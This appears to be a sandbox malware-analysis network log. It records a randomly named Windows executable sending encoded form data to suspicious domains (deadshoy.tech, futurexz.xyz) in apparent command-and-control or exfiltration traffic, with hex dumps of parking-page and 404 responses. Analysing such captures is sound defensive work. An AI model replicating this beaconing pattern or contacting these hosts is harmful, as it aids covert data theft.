Jan 11, 2025 05:35:55.549804926 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODUxODdjNzYtMmYyYS00YWZmLWFmZmYtNTVkZTBiOTgyMzZkIiwicGFnZV90aW1lIjoxNzM2NTcwMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49722	199.59.243.228	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:57.829329014 CET	1831	OUT	POST /k45z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.deadshoy.tech Origin: http://www.deadshoy.tech Referer: http://www.deadshoy.tech/k45z/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 4b 6a 48 56 4c 33 65 45 6c 66 44 53 32 47 36 37 43 6a 77 4b 73 73 57 4d 6c 32 4b 70 36 39 7a 56 64 32 62 6b 48 63 2b 58 38 38 71 42 43 46 69 34 68 38 6c 41 73 7a 6a 46 75 6d 65 32 54 62 77 30 45 6c 47 35 7a 59 7a 54 6d 78 2f 4a 4f 76 47 6f 2b 72 35 31 35 2b 63 55 5a 50 2f 6e 78 4b 78 56 72 57 30 32 55 70 59 41 45 61 32 68 54 32 69 69 31 33 4b 36 63 78 77 52 68 38 4b 50 47 4c 6e 6c 78 37 34 70 62 78 31 76 66 54 6a 7a 69 32 68 39 47 5a 31 5a 36 41 59 5a 55 6b 51 47 70 67 69 5a 31 6f 51 64 71 2f 65 42 73 79 77 43 52 77 78 35 43 74 54 31 37 5a 64 59 73 43 6d 59 4e 4c 65 6c 73 7a 4d 48 47 4a 7a 6b 4b 54 38 57 4d 75 74 61 62 63 36 30 71 61 63 2b 43 69 2f 53 56 54 33 59 39 4d 50 35 6b 62 72 67 67 76 31 55 66 52 64 68 32 52 56 6e 2f 44 71 6a 33 53 50 52 6d 35 69 38 39 4b 4d 38 33 72 71 6c 51 33 54 47 74 43 6c 48 36 30 5a 7a 2b 6f 31 5a 66 32 4a 73 53 43 65 71 6e 4f 6c 4a 57 42 58 44 62 4e 54 70 75 42 57 55 62 69 50 4c 59 66 69 45 33 55 37 6e 73 67 75 72 78 78 56 62 73 79 42 63 6f 37 58 4c 59 6a 36 [TRUNCATED] Data Ascii: 5t=KjHVL3eElfDS2G67CjwKssWMl2Kp69zVd2bkHc+X88qBCFi4h8lAszjFume2Tbw0ElG5zYzTmx/JOvGo+r515+cUZP/nxKxVrW02UpYAEa2hT2ii13K6cxwRh8KPGLnlx74pbx1vfTjzi2h9GZ1Z6AYZUkQGpgiZ1oQdq/eBsywCRwx5CtT17ZdYsCmYNLelszMHGJzkKT8WMutabc60qac+Ci/SVT3Y9MP5kbrggv1UfRdh2RVn/Dqj3SPRm5i89KM83rqlQ3TGtClH60Zz+o1Zf2JsSCeqnOlJWBXDbNTpuBWUbiPLYfiE3U7nsgurxxVbsyBco7XLYj68BrU6nZWEnvq5Y+1gykOK83gfnLejXKaYq0K97lW7US4F7s9uxKRKGuNyIdmxm1YS1g1ub1um6JXBbzJ9FmXL6nzK4E8ek2z9XkM/mukSbxmWEGCLyzK1W3JSby96LkX8hBjJz82+hss08OTRfvyk6K0O3RU6VntReskSSJPjMvLQ4nNK50KrrSuiwha4CimL4s07xuco36yiXw59J3JPAcyWzQk9Fs9O0TN3TmT+xmfA089NfRGGPJcOKrRyosMIb8/RsMWA4iY5uxz8c00U/rJstxbwgG00dx0kQbJWae02xTxubpPoTg9L45dp570sIfFMUJmxBHc0GZV/ZXKN5yVNrlvLITTVApM1wKw7kmQDG431P5gZcoHKvmM3VXrtua1g/M9jhCDIi+FozIdQ5sjUTO+a4MTnZyFU9/HcVJ1x7lbrwxOkd60yxdRXdHq+7PRCIM249ycfUsA2U6qDsN/9jRkTEH7vC4Yj/8x55AV7ihsp9U0w7mUMHOcW3e6fAoyts6aeLI/fFvZ9omZP+BiYLSoHFmzTuMqaXpxJlMV6UDJRjmOIfJW7h01R+AAibfMjB8xbWEJaoNROd37zrDqNzAQwacl/UAKtwKK7BE8xxgrymXUprLbElnodl2h9C5G+3rbMMR+MfQptAjpIs7uz+5ytmTS9X [TRUNCATED]
Jan 11, 2025 05:35:58.237869978 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:35:57 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 9d39b943-08ee-4ce7-b3e4-45d28676b9ec cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig== set-cookie: parking_session=9d39b943-08ee-4ce7-b3e4-45d28676b9ec; expires=Sat, 11 Jan 2025 04:50:58 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 74 65 32 7a 37 74 43 72 6c 7a 46 58 43 69 67 66 6f 74 34 77 6a 41 41 64 77 4c 2f 6f 70 31 76 30 45 6f 54 42 43 70 6a 45 46 53 30 38 35 72 2b 38 36 7a 44 68 6f 4c 6e 76 7a 2b 46 61 4d 58 61 65 63 65 6e 62 65 47 49 76 6b 77 32 64 33 77 71 39 2f 46 42 69 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nte2z7tCrlzFXCigfot4wjAAdwL/op1v0EoTBCpjEFS085r+86zDhoLnvz+FaMXaecenbeGIvkw2d3wq9/FBig==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:35:58.237886906 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWQzOWI5NDMtMDhlZS00Y2U3LWIzZTQtNDVkMjg2NzZiOWVjIiwicGFnZV90aW1lIjoxNzM2NTcwMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49723	199.59.243.228	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:00.477195024 CET	545	OUT	GET /k45z/?5t=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4Bbg8ZTQ9OS97MohncYSMMJNOepQVGz5jqmT1tBqJmbKI6tkg==&HBa8C=1TmdP6ixExB8DV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.deadshoy.tech User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:36:00.925107002 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 04:36:00 GMT content-type: text/html; charset=utf-8 content-length: 1502 x-request-id: 373029c4-3798-43b3-9892-1a226ce8bd03 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SIcJNqY1DLVtd57u2XOaroaILUqh+S6BoLaZxrByuDocuafmnVv7iQ/O6iqXr3ABydyMwqHsEBd/ryDNnd8nbg== set-cookie: parking_session=373029c4-3798-43b3-9892-1a226ce8bd03; expires=Sat, 11 Jan 2025 04:51:00 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 53 49 63 4a 4e 71 59 31 44 4c 56 74 64 35 37 75 32 58 4f 61 72 6f 61 49 4c 55 71 68 2b 53 36 42 6f 4c 61 5a 78 72 42 79 75 44 6f 63 75 61 66 6d 6e 56 76 37 69 51 2f 4f 36 69 71 58 72 33 41 42 79 64 79 4d 77 71 48 73 45 42 64 2f 72 79 44 4e 6e 64 38 6e 62 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SIcJNqY1DLVtd57u2XOaroaILUqh+S6BoLaZxrByuDocuafmnVv7iQ/O6iqXr3ABydyMwqHsEBd/ryDNnd8nbg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:36:00.925144911 CET	955	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzczMDI5YzQtMzc5OC00M2IzLTk4OTItMWEyMjZjZThiZDAzIiwicGFnZV90aW1lIjoxNzM2NTcwMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49724	209.74.79.40	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:14.042711020 CET	791	OUT	POST /bhaz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.futurexz.xyz Origin: http://www.futurexz.xyz Referer: http://www.futurexz.xyz/bhaz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 51 31 71 65 48 54 46 4c 63 70 34 51 71 4c 69 73 30 6c 73 6d 48 73 37 78 75 63 35 74 51 61 4b 52 69 42 7a 57 39 4a 62 75 59 75 75 4f 76 39 63 50 6d 66 66 31 33 64 6f 34 79 75 61 39 74 76 37 79 55 6a 65 69 36 55 31 69 6c 6b 30 55 2b 49 72 4c 35 6e 69 61 76 2b 63 76 31 79 4a 6b 77 64 67 47 44 66 64 67 73 48 30 33 2b 6a 73 36 39 52 51 41 4a 4e 36 32 6c 69 75 69 62 6e 39 6c 5a 72 6a 45 4d 4b 75 4b 54 2f 75 2f 64 69 4f 6d 6c 77 2b 53 69 5a 56 6f 6a 4b 74 2f 6a 73 6d 49 51 57 46 30 63 31 33 47 52 6a 70 39 43 6e 47 44 76 35 67 79 6b 4b 32 68 2f 47 36 6b 33 37 63 54 30 43 67 78 38 5a 6b 7a 4e 6a 73 3d Data Ascii: 5t=Q1qeHTFLcp4QqLis0lsmHs7xuc5tQaKRiBzW9JbuYuuOv9cPmff13do4yua9tv7yUjei6U1ilk0U+IrL5niav+cv1yJkwdgGDfdgsH03+js69RQAJN62liuibn9lZrjEMKuKT/u/diOmlw+SiZVojKt/jsmIQWF0c13GRjp9CnGDv5gykK2h/G6k37cT0Cgx8ZkzNjs=
Jan 11, 2025 05:36:14.626615047 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:36:14 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49725	209.74.79.40	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:16.598676920 CET	811	OUT	POST /bhaz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.futurexz.xyz Origin: http://www.futurexz.xyz Referer: http://www.futurexz.xyz/bhaz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 51 31 71 65 48 54 46 4c 63 70 34 51 71 72 79 73 34 6c 51 6d 46 4d 37 32 69 38 35 74 5a 36 4b 64 69 42 2f 57 39 4e 43 31 5a 61 43 4f 76 64 4d 50 6e 61 72 31 30 64 6f 34 39 4f 61 43 77 2f 37 70 55 6a 53 45 36 58 74 69 6c 6b 51 55 2b 4d 76 4c 34 57 69 64 75 75 64 4a 7a 79 4a 6d 74 4e 67 47 44 66 64 67 73 48 67 64 2b 6a 30 36 39 45 41 41 50 63 36 31 73 43 75 39 4d 58 39 6c 4f 62 6a 41 4d 4b 75 34 54 2b 43 42 64 6b 4b 6d 6c 78 4f 53 69 6f 56 6e 70 4b 74 39 2b 63 6e 33 66 69 4a 35 46 47 47 6e 56 69 70 6f 4a 33 4f 5a 71 50 52 59 2b 6f 2b 6e 38 47 53 50 33 34 30 6c 78 31 39 5a 6d 36 30 44 54 30 34 55 42 78 30 44 6a 37 7a 54 69 47 72 4a 32 2f 41 57 6d 53 66 49 Data Ascii: 5t=Q1qeHTFLcp4Qqrys4lQmFM72i85tZ6KdiB/W9NC1ZaCOvdMPnar10do49OaCw/7pUjSE6XtilkQU+MvL4WiduudJzyJmtNgGDfdgsHgd+j069EAAPc61sCu9MX9lObjAMKu4T+CBdkKmlxOSioVnpKt9+cn3fiJ5FGGnVipoJ3OZqPRY+o+n8GSP340lx19Zm60DT04UBx0Dj7zTiGrJ2/AWmSfI
Jan 11, 2025 05:36:17.160386086 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:36:17 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49726	209.74.79.40	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:19.144337893 CET	1828	OUT	POST /bhaz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.futurexz.xyz Origin: http://www.futurexz.xyz Referer: http://www.futurexz.xyz/bhaz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 51 31 71 65 48 54 46 4c 63 70 34 51 71 72 79 73 34 6c 51 6d 46 4d 37 32 69 38 35 74 5a 36 4b 64 69 42 2f 57 39 4e 43 31 5a 61 4b 4f 75 72 41 50 6d 35 44 31 31 64 6f 34 6a 65 61 48 77 2f 36 7a 55 69 36 59 36 51 6c 79 6c 6d 34 55 2f 70 37 4c 70 55 4b 64 68 75 64 4a 78 79 4a 6e 77 64 67 54 44 66 4e 38 73 48 77 64 2b 6a 30 36 39 46 77 41 5a 39 36 31 67 69 75 69 62 6e 38 78 5a 72 6a 6b 4d 4a 65 53 54 2b 32 52 64 58 43 6d 6b 52 65 53 78 75 42 6e 71 71 74 7a 75 4d 6e 76 66 6c 41 35 46 43 6e 59 56 69 64 43 4a 30 75 5a 75 61 38 79 6a 4a 6e 36 39 48 4f 35 77 62 51 30 77 31 4a 6b 2b 70 56 79 4f 47 68 36 4a 6b 59 6a 68 39 72 59 77 57 65 64 76 4a 67 77 30 6c 43 36 6b 39 2f 4f 76 6d 4e 6d 74 6e 4b 73 43 47 55 32 4c 4f 63 61 48 62 55 67 76 64 52 36 78 4c 64 54 71 68 6d 70 55 74 46 38 39 62 30 4f 52 44 31 2f 4e 47 58 32 4b 74 67 38 57 64 54 32 6a 69 47 73 4e 47 41 4c 33 6a 66 7a 38 63 45 6a 56 39 43 39 50 69 6d 67 73 46 77 48 57 53 4a 5a 63 67 36 68 30 59 5a 4d 46 4b 78 37 33 68 48 39 48 31 72 73 6d 2b 2f [TRUNCATED] Data Ascii: 5t=Q1qeHTFLcp4Qqrys4lQmFM72i85tZ6KdiB/W9NC1ZaKOurAPm5D11do4jeaHw/6zUi6Y6Qlylm4U/p7LpUKdhudJxyJnwdgTDfN8sHwd+j069FwAZ961giuibn8xZrjkMJeST+2RdXCmkReSxuBnqqtzuMnvflA5FCnYVidCJ0uZua8yjJn69HO5wbQ0w1Jk+pVyOGh6JkYjh9rYwWedvJgw0lC6k9/OvmNmtnKsCGU2LOcaHbUgvdR6xLdTqhmpUtF89b0ORD1/NGX2Ktg8WdT2jiGsNGAL3jfz8cEjV9C9PimgsFwHWSJZcg6h0YZMFKx73hH9H1rsm+/It8LJxGxz96cGoW7GNK1nmLBoTr6ywjropWu28Wo24ElKO1v0guHXxYPqmdXvjp0+8MT+8vKq46dSdgYVkEJzvYAHd6b+QYfh84lIi5nBJ4lT8VCjBz8fi8HcCCSj2ulEPSO7NqKAlOqlBsHqpDCxg6NzJDGU2V5Yv4YZYfuFf7vRT9Nb0RcpSnGa0zSY5sSjj4ISSNLV+tqpC9aoTyXeRNAPF2q7XAbeqydIimF4k7Jj8Ijsyv1PWCxbUSrHH/t71GVcSqfXnuWCCpd7oSHPNbxruviC+oRL9ufNmWFgIioMPWAjdeZAwP8ILecFM6nofRfjLj6/zKOhW6Jz94kpsTcy2VcRdxRMa+QFaMNEiohWZRhxcyu/ym1JzAmAby7heX776FCFzN3UgS2kUo5ycMAEK4NbK72t7v+ZGe8Gr+BsmLKyTcmtcwhwk0ClRAWxQvjfVFof0w51/ig9m2wWPjrdpD3yn8ZFDOznCTm95rC+pxZcG6EeiOC6qvsRkXZwwqKTLiBEIkW42tg0SixpaRcssWcdif8b5d+nStlQS+Ktcpo0Go/EskOafR4Uiu3j8gRvJA+F0L3fMKtLrj1m2BnbsK24tSlC9XEdKDv1SDCWowwBO3E2km7sdxwAv10RqUs4YBanu/+Dv22TzJzCikCHWQaKseIbs [TRUNCATED]
Jan 11, 2025 05:36:19.716115952 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:36:19 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 